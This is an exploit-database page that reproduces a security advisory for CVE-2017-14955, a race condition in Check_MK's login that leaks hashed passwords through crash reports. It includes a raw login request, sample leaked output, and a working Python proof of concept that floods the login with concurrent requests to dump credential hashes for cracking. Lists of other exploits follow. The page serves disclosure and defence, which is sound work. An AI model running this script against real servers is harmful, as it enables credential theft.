Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Check_MK 1.2.8p25 - Information Disclosure"

Author

Exploit author

"Julien Ahrens"

Platform

Exploit platform

python

Release date

Exploit published date

2017-10-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
1. ADVISORY INFORMATION
=======================
Product:        Check_mk
Vendor URL:     https://mathias-kettner.de/check_mk.html
Type:           Race Condition [CWE-362]
Date found:     2017-09-21
Date published: 2017-10-18
CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE:            CVE-2017-14955


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.


4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.

On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):

[..]
   # Check_MK's monitoring contacts
   filename = root_dir + "contacts.mk.new"
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
   out.close()
   os.rename(filename, filename[:-4])

   # Users with passwords for Multisite
   filename = multisite_dir + "users.mk.new"
   make_nagios_directory(multisite_dir)
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
   out.close()
   os.rename(filename, filename[:-4])
[...]

When sending many concurrent authentication requests with an existing/valid
username, such as:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:

</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                             'contactgroups': ['all'],
                             'disable_notifications': False,
                             'email': u'[email protected]',
                             'enforce_pw_change': False,
                             'last_pw_change': 0,
                             'last_seen': 0.0,
                             'locked': False,
                             'num_failed': 0,
                             'pager': '',
                             'password': '$1$400000$13371337asdfasdf',
                             'roles': ['admin'],
                             'serial': 2},

A script to automatically exploit this vulnerability can be found on [0].

6. POC
======

#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version:       <=3D 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass

# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"

proxies =3D {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content

NUM =3D 50

threads =3D []
for i in range(NUM):
    t =3D threading.Thread(target=3Dmake_session)
    threads.append(t)
    t.start()

7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.

The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)


8. SOLUTION
===========
Update to 1.2.8p26.


9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure


10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "Ünsal Furkan Harani"
2020-08-04 "Pi-hole 4.3.2 - Remote Code Execution (Authenticated)" webapps python "Luis Vacacas"
2019-12-24 "Django < 3.0 < 2.2 < 1.11 - Account Hijack" webapps python "Ryuji Tsutsui"
2019-10-14 "Ajenti 2.1.31 - Remote Code Execution" webapps python "Jeremy Brown"
2019-09-30 "TheSystem 1.0 - Command Injection" webapps python "Sadik Cetin"
2019-09-30 "thesystem 1.0 - Cross-Site Scripting" webapps python "Anıl Baran Yelken"
2019-04-03 "PhreeBooks ERP 5.2.3 - Remote Command Execution" remote python "Metin Yunus Kandemir"
2019-02-15 "Jinja2 2.10 - 'from_string' Server Side Template Injection" webapps python JameelNabbo
2019-01-07 "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
Release Date Title Type Platform Author
2020-11-27 "Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF" webapps multiple "Julien Ahrens"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-04-10 "Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution" webapps php "Julien Ahrens"
2017-12-26 "Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation" local windows "Julien Ahrens"
2017-10-18 "Check_MK 1.2.8p25 - Information Disclosure" webapps python "Julien Ahrens"
2017-10-13 "AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery" webapps php "Julien Ahrens"
2016-11-22 "AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting" webapps java "Julien Ahrens"
2016-11-21 "Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal" webapps java "Julien Ahrens"
2016-07-13 "Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps xml "Julien Ahrens"
2016-05-23 "XenAPI 1.4.1 for XenForo - Multiple SQL Injections" webapps php "Julien Ahrens"
2016-02-23 "Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery" webapps json "Julien Ahrens"
2014-06-01 "Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)" remote windows "Julien Ahrens"
2014-03-17 "Free Download Manager - Stack Buffer Overflow" dos windows "Julien Ahrens"
2014-03-09 "GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution" remote windows "Julien Ahrens"
2014-02-20 "VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution" remote windows "Julien Ahrens"
2014-02-19 "VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow" remote windows "Julien Ahrens"
2013-11-30 "Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)" local windows "Julien Ahrens"
2013-11-18 "Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow" dos windows "Julien Ahrens"
2013-09-08 "Watchguard Server Center - Local Privilege Escalation" local windows "Julien Ahrens"
2013-07-02 "Winamp 5.63 - Invalid Pointer Dereference" dos windows "Julien Ahrens"
2013-07-02 "Winamp 5.63 - Stack Buffer Overflow" dos windows "Julien Ahrens"
2013-05-04 "ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow" local windows "Julien Ahrens"
2013-03-22 "Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation" local windows "Julien Ahrens"
2013-03-04 "HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting" webapps java "Julien Ahrens"
2013-02-23 "Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities" remote windows "Julien Ahrens"
2013-02-15 "Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption" local windows "Julien Ahrens"
2013-01-14 "Serva 2.0.0 - DNS Server QueryName Remote Denial of Service" dos windows "Julien Ahrens"
2013-01-14 "Serva 2.0.0 - HTTP Server GET Remote Denial of Service" dos windows "Julien Ahrens"
2012-11-20 "FormatFactory 3.0.1 - Profile File Handling Buffer Overflow" local windows "Julien Ahrens"
2012-11-12 "Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing" local windows "Julien Ahrens"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/43021/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.